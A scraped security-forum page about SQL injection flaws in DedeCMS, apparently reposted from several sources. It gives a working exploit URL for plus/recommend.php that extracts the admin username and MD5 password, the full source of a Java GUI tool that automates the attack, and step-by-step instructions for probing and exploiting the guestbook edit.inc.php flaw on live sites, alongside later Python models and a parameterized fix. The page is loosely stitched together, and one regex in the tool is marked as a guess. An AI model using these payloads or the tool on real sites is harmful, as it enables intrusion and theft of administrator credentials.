Introduction to the DEDECMS SQL injection vulnerability, with code and tools

Source: Internet
Author: User
Tags: foreach, addgroup, sql injection

Recently, netizens found an SQL injection bug in DedeCMS that affects all versions; the latest official release has already fixed it. The exploit code is as follows:

Exp:

plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd) from `%23@__admin` limit 0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111

(The key name is _FILES in upper case, as PHP names the superglobal; %23 is a URL-encoded # so that `#@__admin` is rewritten to the site's real admin table, and column 4 of the UNION returns |userid|pwd of the first admin row.)
Source of the exploitation tool (written by the site owner):

package org.javaweb.dede.ui;

import java.awt.Toolkit;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 *
 * @author YZ
 */
public class MainFrame extends javax.swing.JFrame {

    private static final long serialVersionUID = 1L;

    /**
     * Creates new form MainFrame
     */
    public MainFrame() {
        initComponents();
    }

    /** Fetches the given URL over HTTP and returns the response body as text. */
    public String request(String url) {
        StringBuilder str = new StringBuilder();
        String tmp;
        try {
            BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));
            while ((tmp = br.readLine()) != null) {
                str.append(tmp).append("\r\n");
            }
            br.close();
        } catch (Exception e) {
            jTextArea1.setText(e.toString());
        }
        return str.toString();
    }

    private void initComponents() {

        jPanel1 = new javax.swing.JPanel();
        jLabel1 = new javax.swing.JLabel();
        jTextField1 = new javax.swing.JTextField();
        jButton1 = new javax.swing.JButton();
        jScrollPane1 = new javax.swing.JScrollPane();
        jTextArea1 = new javax.swing.JTextArea();

        setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);

        jLabel1.setText("URL:");
        jTextField1.setText("http://localhost");

        this.setTitle("Dedecms recommend.php injection Tool-p2j.cn");

        int screenWidth = Toolkit.getDefaultToolkit().getScreenSize().width;
        int screenHeight = Toolkit.getDefaultToolkit().getScreenSize().height;
        this.setBounds(screenWidth / 2 - 229, screenHeight / 2 - 158, 458, 316);

        jButton1.setText("get");
        jButton1.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                jButton1ActionPerformed(evt);
            }
        });

        jTextArea1.setColumns(20);
        jTextArea1.setRows(5);
        jScrollPane1.setViewportView(jTextArea1);

        javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);
        jPanel1.setLayout(jPanel1Layout);
        jPanel1Layout.setHorizontalGroup(
            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(jPanel1Layout.createSequentialGroup()
                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)
                    .addComponent(jScrollPane1, javax.swing.GroupLayout.Alignment.LEADING)
                    .addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup()
                        .addContainerGap()
                        .addComponent(jLabel1)
                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                        .addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 331, javax.swing.GroupLayout.PREFERRED_SIZE)
                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                        .addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)))
                .addGap(0, 0, Short.MAX_VALUE))
        );
        jPanel1Layout.setVerticalGroup(
            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(jPanel1Layout.createSequentialGroup()
                .addContainerGap()
                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
                    .addComponent(jLabel1)
                    .addComponent(jTextField1,
                        javax.swing.GroupLayout.PREFERRED_SIZE,
                        javax.swing.GroupLayout.DEFAULT_SIZE,
                        javax.swing.GroupLayout.PREFERRED_SIZE)
                    .addComponent(jButton1))
                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                .addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.MAX_VALUE))
        );

        javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
        getContentPane().setLayout(layout);
        layout.setHorizontalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
        );
        layout.setVerticalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
        );

        pack();
    } // </editor-fold>

    private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {
        String url = jTextField1.getText();
        if (null == url || "".equals(url)) {
            return;
        }
        // Same payload as the Exp above, URL-encoded (%27 is the single quote).
        // Column 4 of the UNION is CONCAT(0x7c,userid,0x7c,pwd), so the response
        // carries "|userid|pwd" for the first row of the admin table.
        String result = request(url + "/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20concat(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294");
        // The original regular expression was lost when this page was extracted;
        // the pattern below is an assumption that captures the "|userid|pwd"
        // marker produced by the CONCAT() above.
        Matcher m = Pattern.compile("(\\|[^|<\\s]+\\|[^|<\\s]+)").matcher(result);
        if (m.find()) {
            String[] s = m.group(1).split("\\|"); // s[0] is empty, s[1] userid, s[2] pwd
            if (s.length > 2) {
                jTextArea1.setText("UserName:" + s[1] + "\r\nMD5:" + s[2]);
            }
        }
    }

    public static void main(String args[]) {
        java.awt.EventQueue.invokeLater(new Runnable() {
            public void run() {
                new MainFrame().setVisible(true);
            }
        });
    }

    // Variables declaration - do not modify
    private javax.swing.JButton jButton1;
    private javax.swing.JLabel jLabel1;
    private javax.swing.JPanel jPanel1;
    private javax.swing.JScrollPane jScrollPane1;
    private javax.swing.JTextArea jTextArea1;
    private javax.swing.JTextField jTextField1;
    // End of variables declaration
}

Now look at the file include/filter.inc.php.

To quote a remark from Gothic:

This is the root of yet another dumb DedeCMS variable-overwrite vulnerability.

This is meant to filter or replace illegal keywords. Normal.

/* Filter _GET, _POST and _COOKIE */
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v)
    {
        ${$_k} = _FilterAll($_k,$_v);
    }
}

This amounts to assigning every request variable all over again, so the earlier filtering has no effect.
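To make the link between the Exp above and this foreach concrete, here is an added Python model of what the loop does to a request key named _FILES[type][tmp_name]. It is not DedeCMS code and not from the page's authors: it parses the query string the way PHP nests bracketed keys, assigns every key to a variable of the same name (the ${$_k} = ... line), and shows the attacker's string landing in $_FILES['type']['tmp_name'] although the request uploaded nothing at all. The strict variant, which refuses the names of PHP superglobals and the cfg_ prefix, is an assumption about what a fix looks like, not DedeCMS's own check; the starting scope and the query string are constructed from the Exp.

```python
import re
from urllib.parse import parse_qsl

# Assumption: names a fixed register loop should refuse (PHP superglobals and the
# DedeCMS cfg_ prefix). This is not DedeCMS's own list.
BLOCKED_NAMES = {"GLOBALS", "_GET", "_POST", "_COOKIE", "_FILES",
                 "_SERVER", "_ENV", "_REQUEST", "_SESSION"}
BLOCKED_PREFIXES = ("cfg_",)

# Constructed from the Exp above: the part of the URL after '?'.
EXP_QUERY = ("action=&aid=1"
             "&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*/"
             "/*!50000select*/1,2,3,(select%20concat(0x7c,userid,0x7c,pwd)+from+"
             "`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+"
             "&_FILES[type][name]=1.jpg"
             "&_FILES[type][type]=application/octet-stream"
             "&_FILES[type][size]=111")


def split_php_key(key):
    """'_FILES[type][tmp_name]' -> ('_FILES', ['type', 'tmp_name']),
    mirroring how PHP turns bracketed query keys into nested arrays."""
    m = re.fullmatch(r"([^\[]+)((?:\[[^\]]*\])*)", key)
    if not m:
        return key, []
    return m.group(1), re.findall(r"\[([^\]]*)\]", m.group(2))


def register_request_vars(query, scope, strict=False):
    """Models the foreach in filter.inc.php: each request key is assigned to a
    variable of the same name (${$_k} = ...), overwriting whatever was there.
    With strict=True, blocked names raise instead of being overwritten."""
    scope = dict(scope)
    for key, value in parse_qsl(query, keep_blank_values=True):
        name, path = split_php_key(key)
        if strict and (name in BLOCKED_NAMES or name.startswith(BLOCKED_PREFIXES)):
            raise ValueError("Request var not allow: " + name)
        if not path:
            scope[name] = value
            continue
        node = scope.setdefault(name, {})
        if not isinstance(node, dict):
            node = scope[name] = {}
        for part in path[:-1]:
            node = node.setdefault(part, {})
        node[path[-1]] = value
    return scope


def injected_tmp_name(query, strict=False):
    """What $_FILES['type']['tmp_name'] holds after registration, or None.
    The starting scope is constructed: an empty $_FILES, i.e. no real upload."""
    scope = register_request_vars(query, {"_FILES": {}}, strict=strict)
    files = scope["_FILES"]
    if not isinstance(files, dict):
        return None
    return files.get("type", {}).get("tmp_name")


if __name__ == "__main__":
    print("vulnerable loop  :", injected_tmp_name(EXP_QUERY))
    try:
        injected_tmp_name(EXP_QUERY, strict=True)
    except ValueError as err:
        print("strict loop      :", err)
```

The decoded value that ends up in $_FILES['type']['tmp_name'] begins with \' or mid=@`\'`, which is exactly the text the Exp needs recommend.php to drop into its query; the keyword-replacing _FilterAll() never stood a chance, because the damage is the assignment itself, not the value's contents.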

1. To effectively stop this post from being copied and republished.
2. Some fresh vulnerabilities have to be posted behind a permission threshold. Naturally everyone who wants to read the better posts will want a promotion, and to get promoted they first have to post good content themselves, so good posts naturally multiply.
I don't know whether that reasoning holds, but that is how I see it. Of course, after a while the view permission will be set to 0. Let the people who post good content and get promoted see it first, just as WooYun's core members see things before ordinary members do. I think that is better!


Vulnerability: DEDECMS 5.7 latest SQL injection vulnerability
Author: Brother Ghost
Copyright: www.90sec.org

Before reading this post you need to make sure of the following:
1. That you are of good character.
2. That you will not use it illegally (find and fix the leak, do no harm) [otherwise the consequences are yours alone].
3. That you absolutely, 100%, will not spread or repost it publicly (if I find it spread or reposted, I can only say I will be very sad! An unpublished vulnerability can be played with for a while first).
4. Respect copyright!

The specific code of the vulnerable file edit.inc.php:

<?php

if(!defined('DEDEINC')) exit('Request Error!');

if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];
else $GUEST_BOOK_POS = "guestbook.php";

$id = intval($id);
if(empty($job)) $job = 'view';

if($job == 'del' && $g_isadmin)
{
    $dsql->ExecuteNoneQuery("DELETE FROM `#@__guestbook` WHERE id='$id' ");
    ShowMsg("Message deleted successfully!", $GUEST_BOOK_POS);
    exit();
}
else if($job == 'check' && $g_isadmin)
{
    $dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");
    ShowMsg("Message approved successfully!", $GUEST_BOOK_POS);
    exit();
}
else if($job == 'editok')
{
    $remsg = trim($remsg);
    if($remsg != '')
    {
        // Admin replies are not HTML-filtered
        if($g_isadmin)
        {
            $msg = "<div class=\'rebox\'>".$msg."</div>\n<br><font color=red>Admin reply:</font>".$remsg;
        }
        else
        {
            $row = $dsql->GetOne("SELECT msg FROM `#@__guestbook` WHERE id='$id' ");
            $oldmsg = "<div class=\'rebox\'>".addslashes($row['msg'])."</div>\n";
            $remsg = TrimMsg(cn_substrR($remsg,1024),1);
            $msg = $oldmsg.$remsg;
        }
    }
    // $msg is not filtered at all on this path (when $remsg is empty it is used
    // exactly as received), so arbitrary SQL can be injected here
    $dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");
    ShowMsg("Successfully changed or replied to a message!", $GUEST_BOOK_POS);
    exit();
}

if($g_isadmin)
{
    $row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id' ");
    require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');
}
else
{
    $row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id' ");
    require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');
}


Successful exploitation requires two conditions:
1. PHP magic_quotes_gpc = Off
2. The vulnerable file plus/guestbook.php exists (and with it, of course, the dede_guestbook table).

How to determine whether a site is vulnerable:
First open www.xxx.com/plus/guestbook.php; you will see other people's messages.
Hover the mouse over [Reply/Edit] to see the ID of someone else's message, and note that ID down.
Then visit: www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=90sec'&id=<existing message ID>
On DedeCMS 5.7 the submission will show "Successfully changed or replied to a message", which only means the UPDATE was attempted.
Go back to www.xxx.com/plus/guestbook.php and check whether the message with that ID has turned into 90sec'. If it has, the quote was escaped on the way in, the bug cannot be exploited there, and you would need someone to turn magic_quotes_gpc off for you.
If the message was not modified, i.e. it still shows its previous content, the stray quote broke the query and the vulnerability is exploitable.
Then visit www.xxx.com/plus/guestbook.php?action=admin&job=editok&id=<existing message ID>&msg=',msg=user(),email='
Go back to the guestbook: the content of that message has been replaced directly with the result of MySQL's user().
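The procedure above, as an added example that is not part of the original post: a Python/SQLite stand-in for the job=editok branch of edit.inc.php, running both the probe (msg=90sec') and the real payload against the string-built UPDATE and against a parameterized one. Assumptions: the table dede_guestbook and its single row are constructed; SQLite replaces MySQL so the example runs offline; SQLite has no user(), so sqlite_version() stands in for it; the magic_quotes_gpc=On case is not modelled, because addslashes()-style escaping only means something to MySQL.

```python
import sqlite3


def make_guestbook():
    """Constructed stand-in for `#@__guestbook` with one existing message."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE dede_guestbook ("
                "id INTEGER PRIMARY KEY, title TEXT, msg TEXT, email TEXT, posttime INTEGER)")
    con.execute("INSERT INTO dede_guestbook VALUES (7, 'hi', 'original message', 'a@example.com', 0)")
    con.commit()
    return con


def editok_vulnerable(con, id_, msg, posttime=1):
    """The UPDATE as edit.inc.php builds it: $id passes through intval(),
    $msg is interpolated raw. Returns whether the statement ran at all."""
    sql = ("UPDATE dede_guestbook SET msg='%s', posttime='%s' WHERE id='%d'"
           % (msg, posttime, int(id_)))
    try:
        con.execute(sql)
        con.commit()
        return True     # ShowMsg("Successfully changed ...") would follow either way
    except sqlite3.OperationalError:
        return False    # a stray quote broke the SQL; the row is left untouched


def editok_safe(con, id_, msg, posttime=1):
    """Hardened form: bound parameters, so quotes in $msg are data, never syntax."""
    con.execute("UPDATE dede_guestbook SET msg=?, posttime=? WHERE id=?",
                (msg, posttime, int(id_)))
    con.commit()
    return True


def read_msg(con, id_):
    return con.execute("SELECT msg FROM dede_guestbook WHERE id=?",
                       (int(id_),)).fetchone()[0]


PROBE = "90sec'"                                  # step 1 of the page's test
PAYLOAD = "',msg=sqlite_version(),email='"        # page: ',msg=user(),email='


def probe_is_exploitable(update=editok_vulnerable):
    """The page's check: after sending msg=90sec', an unchanged message means the
    quote reached the parser unescaped, i.e. the injection will work."""
    con = make_guestbook()
    update(con, 7, PROBE)
    return read_msg(con, 7) == "original message"


def leak_via_update(update=editok_vulnerable):
    """Step 2: the payload closes msg, re-assigns msg from a function call,
    and reopens a quote so the rest of the statement stays valid."""
    con = make_guestbook()
    update(con, 7, PAYLOAD)
    return read_msg(con, 7)


if __name__ == "__main__":
    print("vulnerable, probe unchanged:", probe_is_exploitable())
    print("vulnerable, leaked value   :", leak_via_update())
    print("safe, probe unchanged      :", probe_is_exploitable(editok_safe))
    print("safe, stored literally     :", leak_via_update(editok_safe))
```

Both MySQL and SQLite keep the last assignment to a column that appears twice in a SET list, which is why msg='' followed by msg=user() (here sqlite_version()) wins. With the parameterized version the probe is stored as the literal 90sec', which is the same "message changed, not exploitable" signal the post describes for magic_quotes_gpc=On, but obtained without relying on a PHP setting.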
